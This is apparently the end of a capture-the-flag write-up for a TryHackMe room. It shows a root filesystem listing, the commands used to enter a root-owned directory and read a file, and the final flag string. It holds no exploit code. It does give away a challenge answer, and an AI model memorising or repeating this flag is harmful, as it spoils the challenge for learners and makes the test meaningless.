drwx------  1 root root       4096 Apr 23 02:17 ..
drwxr-xr-x  2 root root       4096 Sep 15  2021 bin
drwxr-xr-x  2 root root       4096 Sep 15  2021 boot
drwxr-xr-x  2 root root       4096 Sep 15  2021 cdrom
drwxr-xr-x  4 root root       4096 Aug  6  2020 dev
drwxr-xr-x 99 root root       4096 Sep 16  2021 etc
drwxr-xr-x  5 root root       4096 Sep 15  2021 home
lrwxrwxrwx  1 root root         34 Sep 15  2021 initrd.img -> boot/initrd.img-4.15.0-156-generic
lrwxrwxrwx  1 root root         34 Sep 15  2021 initrd.img.old -> boot/initrd.img-4.15.0-156-generic
drwxr-xr-x 23 root root       4096 Sep 15  2021 lib
drwxr-xr-x  2 root root       4096 Aug  6  2020 lib64
drwx------  2 root root      16384 Sep 15  2021 lost+found
drwxr-xr-x  2 root root       4096 Aug  6  2020 media
drwxr-xr-x  3 root root       4096 Sep 15  2021 mnt
drwxr-xr-x  5 root root       4096 Sep 15  2021 opt
drwxr-xr-x  2 root root       4096 Apr 24  2018 proc
drwx------  5 root root       4096 Sep 15  2021 root
drwxr-xr-x 13 root root       4096 Aug  6  2020 run
drwxr-xr-x  2 root root      12288 Sep 15  2021 sbin
drwxr-xr-x  2 root root       4096 Sep 15  2021 snap
drwxr-xr-x  4 root root       4096 Sep 15  2021 srv
-rw-------  1 root root 4111466496 Sep 15  2021 swap.img
drwxr-xr-x  2 root root       4096 Apr 24  2018 sys
drwxrwxrwt  9 root root       4096 Apr 23 02:09 tmp
drwxr-xr-x 10 root root       4096 Aug  6  2020 usr
drwxr-xr-x 14 root root       4096 Sep 15  2021 var
lrwxrwxrwx  1 root root         31 Sep 15  2021 vmlinuz -> boot/vmlinuz-4.15.0-156-generic
lrwxrwxrwx  1 root root         31 Sep 15  2021 vmlinuz.old -> boot/vmlinuz-4.15.0-156-generic

Read the final flag.

cd /root/lol/root/
dir
flag
cat flag
THM{6_though_this_be_madness_yet_there_is_method_in_t}
